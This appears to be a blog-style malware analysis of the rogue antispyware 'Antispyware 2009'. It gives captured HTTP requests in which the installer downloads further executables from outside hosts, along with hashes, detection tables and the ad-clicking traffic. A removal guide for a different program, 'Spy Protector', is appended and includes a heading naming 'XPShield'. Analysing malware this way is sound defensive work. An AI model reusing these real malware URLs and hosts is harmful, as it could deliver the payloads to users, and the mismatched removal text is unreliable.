So after clicking on the ADS I was redirected to a new sub-domain:

and if we view the HTML code is possible to see that if we click in the remove button we will be prompted to download a file named setup_246_3777_.exe that is the real setup file of the rogue security software.

Report Generated 13.11.2008 at 20.33.51 (GMT 1)
Filename: setup_246_3777_.exe
File size: 112 KB
MD5 Hash: E9339F9045368947789EC70739DE4B21
SHA1 Hash: DC7B37C1158F5AD4D3E092AFCADE58A5E3FC145B
Application Type: Executable (EXE) 32bit
Detection Rate: 0 on 23

After I executed the .EXE file we started to get some new traffic:

1
2
3
4
5
6
7

GET /get/?type=scanner&pin=246&lnd=3777 HTTP/1.1
User-Agent: Installer
Host: dl.storage-antispyware.com
 
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=scanner_246_3777_.exe
Content-Transfer-Encoding: binary

From this traffic we can see that a new file is downloaded:

1

filename=scanner_246_3777_.exe

It is the installer for the rogue security software Antispyware 2009!

Report Generated 13.11.2008 at 21.24.07 (GMT 1)
Filename: scanner_246_3777_.exe
File size: 811 KB
MD5 Hash: E0F855C6C5FC93F0A8ED1FE9E702E492
SHA1 Hash: 77ACC5822A5EBD734075BDF4752EC6F10617050F
Detection Rate: 9 on 23

 

Antivirus Result
a-squared Trojan.Fakealert.ads.1!IK
Avira AntiVir TR/Fakealert.ads.1
Avast Win32:Spyware-gen [Trj] (0)
AVG Trojan horse SHeur.CQDP
BitDefender Trojan.FakeAlert.AKQ
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Win32:Spyware-gen [Trj] B
IkarusT3 Trojan.Fakealert.ads.1
Kaspersky -
McAfee PWCrack-Winspy trojan
NOD32 v3 -
Norman Aggressive commersial W32/AntiVirus2008.TB ()
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

Next, a new .EXE is downloaded and executed in my system:

1
2
3
4
5
6
7

GET /mxlivemedia/get_file.php HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141
 
GET /mxlivemedia/multi/16.exe HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141

and the file is:

1

Location: multi/16.exe

Report Generated 13.11.2008 at 20.39.42 (GMT 1)
Filename: 16.exe
File size: 598 KB
MD5 Hash: 9A785CF7901E348C1840925EB5E0C5CC
SHA1 Hash: 189EEA8FB44360C5E4011BB471D7F1D8F7B3F7AC
Detection Rate: 2 on 23

 

Antivirus Result
a-squared -
Avira AntiVir -
Avast -
AVG -
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA -
IkarusT3 -
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

After 16.exe is executed we started to get new traffic from new hosts:

1
2
3
4
5
6
7
8
9
10

GET /stat.php?func=install&pid=246&ip=127.0.0.1&landing=3777
Host: int.vbvyu.com
 
GET /smb/nsi_install.php?inst_result=success&hwid=xxx
Host: a2.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)
 
GET /bc/nsi_install.php?aff_id=mxlivemedia&inst_result=success&id=xxx
Host: a1.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)

and after, IEXPLORE.EXE was executed hidden and the malware started to clickjack the ADS Links hidden!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

GET /servlet/ajrotator/246392/0/vh?z=icm&dim=186262
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48dcc730ea0ce.html
Host: rotator.its.adjuggler.com
 
GET /servlet/ajrotator/7678/0/vh?z=ast&ch=7108&dim=56
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48e220b3afd5f.html
Host: servedby.topqualityads.net
 
GET /bc/ads/300x250/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
 
GET /bc/ads/160x600/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
 
GET /bc/ads/728x90/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
 
GET /bc/ads/728x90/48dcc730ea0ce.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
 
POST /bc/123kah.php
Host: a1.mxlivemedia.com

After, new files was created in system32:

Report Generated 13.11.2008 at 20.50.00 (GMT 1)
Filename: msclgkhvhfp.dll
File size: 173 KB
MD5 Hash: 8532E92178E9126A151E31683D896C31
SHA1 Hash: 088E2728D8D7D5E185AF231F54D917605F7CED24
Detection Rate: 6 on 23

 

Antivirus Result
a-squared Generic.Adw.Rotator!IK
Avira AntiVir -
Avast -
AVG -
BitDefender Generic.Adw.Rotator.FF995C71
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Trojan-Clicker.Win32.Agent.evi A
IkarusT3 Generic.Adw.Rotator
Kaspersky Trojan-Clicker.Win32.Agent.evi
McAfee AdClicker-GI trojan
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

Below there are the IEXPLORE.EXE connections:

And finally appeared the image of the rogue security software Antispyware 2009 in the screen:

I have created a small summary of the activity of what happened during this analysis:

And after reading the article of SophosLabs that steve has posted in the comments, I have analyzed with OllyDbg the file setup_246_3777_.exe and below there are some images:

Original Entry Point:

Now, if I follow the address CALL 0040116D, I arrive at the code shown in the image below:

And now, If I follow the address MOV EDX,00405DEC, I arrive at the code shown in image below, that is full of zero bytes (similar to the analysis of SophosLabs):

And for finish, below, I have added some images of the fake alerts shown by Pro Antispyware 2009:

Make sure to not fall in this scam, if your computer is infected with Antispyware 2009, it is recommended to remove it immediately and to scan your system with NoVirusThanks Malware Remover.

Once your computer is infected with this parasite, it will immediately displays security warnings, alerts and system scans stating that your computer is heavily infected. These warnings are all false and are only displayed to make you think your computer is truly infected and that it is necessary to buy the full version of the software to remove the so-called infections.

Make sure to not fall in this scam, if your computer is infected with Spy Protector, it is recommended to remove it immediately and to scan your system with a real security software.

Symptoms of infection

• The process srcss.exe is running in your system
• Slow computer performance
• Repeated security warnings, alerts and system scans
• Web sites that suddenly are shown on your desktop

Malicious web sites and urls:

1

spy-protector.org

When the program is executed, it creates the following files:

1
2
3
4
5
6
7
8
9
10
11
12

%ProgramFiles%\Spy Protector
%UserProfile%\Application Data\install.exe
%UserProfile%\Application Data\shellex.dll
%UserProfile%\Application Data\srcss.exe
%UserProfile%\Application Data\SpyProtector
%UserProfile%\Application Data\SpyProtector\SC_Base_new.dat
%UserProfile%\Application Data\SpyProtector\SC_Config.ini
%UserProfile%\Desktop\Spy Protector.lnk
%UserProfile%\Start Menu\Programs\Spy Protector
%UserProfile%\Start Menu\Programs\Spy Protector\Purchase License.url
%UserProfile%\Start Menu\Programs\Spy Protector\Spy Protector.lnk
%UserProfile%\Start Menu\Programs\Spy Protector\Support Page.url

The program creates the following registry entries:

1
2
3
4
5

HKCU\Software\Microsoft\Windows\CurrentVersion\SpyProtector
HKCR\*\shellex\ContextMenuHandlers\Spy Protector
HKCR\Directory\shellex\ContextMenuHandlers\Spy Protector
HKCR\Drive\shellex\ContextMenuHandlers\Spy Protector
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Spy Protector

How to remove XPShield (manual removal) ?

• Kill all the Spy Protector processes
• Unregister all the Spy Protector DLLs
• Delete all the Spy Protector files
• Delete all the Spy Protector registry entries

How to remove Spy Protector (automatic removal) ?

• Download and Install NoVirusThanks Malware Remover
• Update the database
• Click the button Scan
• Delete infected files